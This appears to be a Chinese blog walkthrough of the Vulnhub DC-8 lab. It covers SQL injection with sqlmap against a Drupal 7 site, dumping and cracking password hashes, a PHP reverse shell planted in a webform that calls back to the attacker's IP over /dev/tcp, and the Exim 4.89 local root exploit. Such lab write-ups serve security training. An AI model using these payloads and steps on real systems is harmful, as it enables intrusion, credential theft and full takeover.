天道酬勤

【Vulnhub】—DC-8

一、主机发现

使用netdiscover,发现主机IP为192.168.203.134

二、端口扫描

root@kali:~# nmap -sV -A 192.168.203.134 --script=vuln
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-16 22:40 CST
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.203.134
Host is up (0.00037s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
80/tcp open  http    Apache httpd
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.203.134
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.203.134:80/node/3
|     Form id: webform-client-form-3
|_    Form action: /node/3
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /rss.xml: RSS or Atom feed
|   /robots.txt: Robots file
|   /UPGRADE.txt: Drupal file
|   /INSTALL.txt: Drupal file
|   /INSTALL.mysql.txt: Drupal file
|   /INSTALL.pgsql.txt: Drupal file
|   /CHANGELOG.txt: Drupal v1
|   /: Drupal version 7 
|   /README.txt: Interesting, a readme.
|   /0/: Potentially interesting folder
|_  /user/: Potentially interesting folder
|_http-server-header: Apache
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
MAC Address: 00:0C:29:05:ED:41 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.37 ms 192.168.203.134

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 66.44 seconds

目标开放22端口和80端口,web站点是一个DrupalCMS的站点,版本为7。

三、漏洞利用

我们访问此站点:

关注点为两个红框,如果点击上面那个红框的内容,url显示为:

http://192.168.203.134/node/2

倘若点击的是下面的红框,则url显示为:

http://192.168.203.134/?nid=2

看到这样的,话不多说,直接测试:

果然存在SQL注入,接下来换上sqlamp。

sqlmap -u http://192.168.203.134/?nid=2 --dbs
----------------------------------------------------------------------------
[22:49:32] [INFO] used SQL query returns 2 entries
[22:49:32] [INFO] retrieved: 'd7db'
[22:49:32] [INFO] retrieved: 'information_schema'
available databases [2]:                                                       
[*] d7db
[*] information_schema


sqlmap -u http://192.168.203.134/?nid=2 -D d7db --tables
----------------------------------------------------------------------------
Database: d7db                                                                                       
[88 tables]
+-----------------------------+
| actions                     |
| authmap                     |
| batch                       |
| block                       |
| block_custom                |
| block_node_type             |
| block_role                  |
| blocked_ips                 |
| cache                       |
| cache_block                 |
| cache_bootstrap             |
| cache_field                 |
| cache_filter                |
| cache_form                  |
| cache_image                 |
| cache_menu                  |
| cache_page                  |
| cache_path                  |
| cache_views                 |
| cache_views_data            |
| ckeditor_input_format       |
| ckeditor_settings           |
| ctools_css_cache            |
| ctools_object_cache         |
| date_format_locale          |
| date_format_type            |
| date_formats                |
| field_config                |
| field_config_instance       |
| field_data_body             |
| field_data_field_image      |
| field_data_field_tags       |
| field_revision_body         |
| field_revision_field_image  |
| field_revision_field_tags   |
| file_managed                |
| file_usage                  |
| filter                      |
| filter_format               |
| flood                       |
| history                     |
| image_effects               |
| image_styles                |
| menu_custom                 |
| menu_links                  |
| menu_router                 |
| node                        |
| node_access                 |
| node_revision               |
| node_type                   |
| queue                       |
| rdf_mapping                 |
| registry                    |
| registry_file               |
| role                        |
| role_permission             |
| search_dataset              |
| search_index                |
| search_node_links           |
| search_total                |
| semaphore                   |
| sequences                   |
| sessions                    |
| shortcut_set                |
| shortcut_set_users          |
| site_messages_table         |
| system                      |
| taxonomy_index              |
| taxonomy_term_data          |
| taxonomy_term_hierarchy     |
| taxonomy_vocabulary         |
| url_alias                   |
| users                       |
| users_roles                 |
| variable                    |
| views_display               |
| views_view                  |
| watchdog                    |
| webform                     |
| webform_component           |
| webform_conditional         |
| webform_conditional_actions |
| webform_conditional_rules   |
| webform_emails              |
| webform_last_download       |
| webform_roles               |
| webform_submissions         |
| webform_submitted_data      |
+-----------------------------+


sqlmap -u http://192.168.203.134/?nid=2 -D d7db -T users --columns
----------------------------------------------------------------------------
Database: d7db                                                                                       
Table: users
[16 columns]
+------------------+------------------+
| Column           | Type             |
+------------------+------------------+
| language         | varchar(12)      |
| access           | int(11)          |
| created          | int(11)          |
| data             | longblob         |
| init             | varchar(254)     |
| login            | int(11)          |
| mail             | varchar(254)     |
| name             | varchar(60)      |
| pass             | varchar(128)     |
| picture          | int(11)          |
| signature        | varchar(255)     |
| signature_format | varchar(255)     |
| status           | tinyint(4)       |
| theme            | varchar(255)     |
| timezone         | varchar(32)      |
| uid              | int(10) unsigned |
+------------------+------------------+


sqlmap -u http://192.168.203.134/?nid=2 -D d7db -T users -C name,pass --dump
----------------------------------------------------------------------------
Database: d7db                                                                                       
Table: users
[2 entries]
+-------+---------------------------------------------------------+
| name  | pass                                                    |
+-------+---------------------------------------------------------+
| admin | $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z |
| john  | $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF |
+-------+---------------------------------------------------------+

两个账号手到擒来~~

接下来使用john,对密码进行破解。

只解出来john用户的密码为turtle,登陆后台。

四、获取shell

根据DC-7中学到的思路,我们可以添加basic page

但是,好像因为john权限不够,无法写入php文件。

那就再重新寻找别的出口。

最终在webform中找到了突破点:

添加:

<?php
system("bash -c 'bash -i >& /dev/tcp/192.168.203.129/7777 0>&1' ");
?> 

然后保存。

那我们该怎么触发呢?发送一封邮件!

点击submit之后,便拿到了shell。

五、提权

利用命令查找suid权限的程序:

find / -user root -perm -4000 -print 2>/dev/null

看到了一个exim4

Exim是一个MTA(Mail Transfer Agent,邮件传输代理)服务器软件,该软件基于GPL协议开发,是一款开源软件。该软件主要运行于类UNIX系统。通常该软件会与Dovecot或Courier等软件搭配使用。Exim同时也是“进出口”(Export-Import)的英文缩写。

可以看到确实有很多的漏洞,我们使用命令查看exim的版本号exim- bV:

版本为4.89

再去searchsploit里看一下:

这里确实存在一个版本号符合且是本地提权的脚本。

两种使用方法:

# Usage (setuid method):
# $ id
# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]
# $ ./raptor_exim_wiz -m setuid
# Preparing setuid shell helper...
# Delivering setuid payload...
# [...]
# Waiting 5 seconds...
# -rwsr-xr-x 1 root raptor 8744 Jun 16 13:03 /tmp/pwned
# # id
# uid=0(root) gid=0(root) groups=0(root)
----------------------------------------------------------------
# Usage (netcat method):
# $ id
# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]
# $ ./raptor_exim_wiz -m netcat
# Delivering netcat payload...
# Waiting 5 seconds...
# localhost [127.0.0.1] 31337 (?) open
# id
# uid=0(root) gid=0(root) groups=0(root)

接下来开启web服务,将脚本下载到目标机器的/tmp目录下,并chmod +x 46996.sh赋权,运行:

我们使用netcat方法,但一直报错:

bash: ./46996.sh: /bin/bash^M: bad interpreter: No such file or directory

去网上找了找原因,win下编写的脚本无法在linux上使用。

我们需要使用命令,将文件转化为unix格式:

root@kali:~# dos2unix 46996.sh
dos2unix: 正在转换文件 46996.sh 为Unix格式...

解决完这个问题就OK了,拿到flag!

www-data@dc-8:/tmp$ ./46996.sh -m netcat
./46996.sh -m netcat

raptor_exim_wiz - "The Return of the WIZard" LPE exploit
Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>

Delivering netcat payload...
220 dc-8 ESMTP Exim 4.89 Mon, 17 Feb 2020 12:51:15 +1000
250 dc-8 Hello localhost [::1]
250 OK
250 Accepted
354 Enter message, ending with "." on a line by itself
250 OK id=1j3WV9-0000MX-2j
221 dc-8 closing connection

Waiting 5 seconds...
localhost [127.0.0.1] 31337 (?) open
python -c 'import pty;pty.spawn("/bin/bash")'
python -c 'import pty;pty.spawn("/bin/bash")'
root@dc-8:/var/spool/exim4# whoami
whoami
whoami
root
root@dc-8:/var/spool/exim4# cd /root
cd /root
cd /root
root@dc-8:/root# ls
ls
ls
flag.txt
root@dc-8:/root# cat flag.txt
cat flag.txt
cat flag.txt


Brilliant - you have succeeded!!!



888       888          888 888      8888888b.                             888 888 888 888
888   o   888          888 888      888  "Y88b                            888 888 888 888
888  d8b  888          888 888      888    888                            888 888 888 888
888 d888b 888  .d88b.  888 888      888    888  .d88b.  88888b.   .d88b.  888 888 888 888
888d88888b888 d8P  Y8b 888 888      888    888 d88""88b 888 "88b d8P  Y8b 888 888 888 888
88888P Y88888 88888888 888 888      888    888 888  888 888  888 88888888 Y8P Y8P Y8P Y8P
8888P   Y8888 Y8b.     888 888      888  .d88P Y88..88P 888  888 Y8b.      "   "   "   "
888P     Y888  "Y8888  888 888      8888888P"   "Y88P"  888  888  "Y8888  888 888 888 888



Hope you enjoyed DC-8.  Just wanted to send a big thanks out there to all those
who have provided feedback, and all those who have taken the time to complete these little
challenges.

I'm also sending out an especially big thanks to:

@4nqr34z
@D4mianWayne
@0xmzfr
@theart42

This challenge was largely based on two things:

1. A Tweet that I came across from someone asking about 2FA on a Linux box, and whether it was worthwhile.
2. A suggestion from @theart42

The answer to that question is...

If you enjoyed this CTF, send me a tweet via @DCAU7.

 

赞(0) 打赏
未经允许不得转载:HackerGu‘s Blog » 【Vulnhub】—DC-8
分享到: 更多 (0)

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址

专注黑客技术的研究

联系我们联系我们

觉得文章有用就打赏一下文章作者

微信扫一扫打赏